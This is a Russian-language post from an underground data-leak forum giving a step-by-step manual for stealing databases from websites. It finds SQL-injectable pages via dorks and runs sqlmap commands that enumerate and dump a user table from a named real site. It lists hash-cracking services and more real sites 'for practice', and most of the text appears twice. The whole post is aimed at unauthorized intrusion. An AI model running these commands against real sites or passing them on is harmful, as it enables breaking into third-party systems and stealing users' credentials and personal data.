![DWH-Форум по обмену приватной информацией [VPN+]](https://dwh.su/styles/prisma/prisma/logotip_2.png)
c0dpro
Всем привет, написал мануал по сливу баз данных с сайтов.
Для этого нам понадобится
Kali linux(так же он есть на win если хотите что бы я показал как сливать на нем пишите в коменты.
Дорки(поисковые запросы дял поиска сайтов с уязвимостью) их я оставлю в конце статьи в формате txt.
Шаг 1.
Первое что мы сделаем, это найдем сайты что уязвимы к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:
что бы проверить его на уязвимость просто подставьте в конец ссылки «'» такой знак в результате вы должны получить вот это
Если страница вернёт SQL ошибку, либо пропадет часть контента, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.
посмотрите на скришоты ниже
Шаг 2
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
Обзор команды
sqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например ( http://www.wlnetwork.com/membership/look.php?id=69 )
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]
и так, сейчас у нас всего 1 база данных, information_schema это стандартная база данных которая есть почти в каждом СУБД MySQL. Это значит что мы направим свой инетерс на бд wlndemc_membersdb.
Шаг 3
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
Круто, это база имеет 114 таблиц.
Ну и конечно мы хотим проверить, что находится внутри think_user, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.
Шаг 4
Построение списка столбцов целевой таблицы.
Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
Ага, вот и то что мы искали) осталось только вытянуть пароли и все остальное)
Шаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.
всё это делаем вот такой командой:
как мы видим у нас пароли в виде хеша md5 вот самые лучшие сервисы который вам помогут расшифровать md5
cmd5.ru
crackstation.net
hashcracking.ru
Вот еще пару сайтов для тренеровки
https://bfgroup.io/blog-preview.php?id=8
http://www.ttn.si/cms/preview.php?id=32
http://petsstop.com/category.php?id=31
http://www.portraitsbywelcomeaboard.com/preview.php?id=1
дорки
https://yadi.sk/i/Sac8GG1N3Wjvhy
Для этого нам понадобится
Kali linux(так же он есть на win если хотите что бы я показал как сливать на нем пишите в коменты.
Дорки(поисковые запросы дял поиска сайтов с уязвимостью) их я оставлю в конце статьи в формате txt.
Шаг 1.
Первое что мы сделаем, это найдем сайты что уязвимы к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:
Код:
http://www.wlnetwork.com/membership/look.php?id=69
Код:
http://www.wlnetwork.com/membership/look.php?id=69'посмотрите на скришоты ниже
Шаг 2
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 --dbssqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например ( http://www.wlnetwork.com/membership/look.php?id=69 )
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]
Шаг 3
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb --tables
Ну и конечно мы хотим проверить, что находится внутри think_user, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.
Шаг 4
Построение списка столбцов целевой таблицы.
Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --columnsШаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.
всё это делаем вот такой командой:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --dumpкак мы видим у нас пароли в виде хеша md5 вот самые лучшие сервисы который вам помогут расшифровать md5
cmd5.ru
crackstation.net
hashcracking.ru
Вот еще пару сайтов для тренеровки
https://bfgroup.io/blog-preview.php?id=8
http://www.ttn.si/cms/preview.php?id=32
http://petsstop.com/category.php?id=31
http://www.portraitsbywelcomeaboard.com/preview.php?id=1
дорки
https://yadi.sk/i/Sac8GG1N3Wjvhy
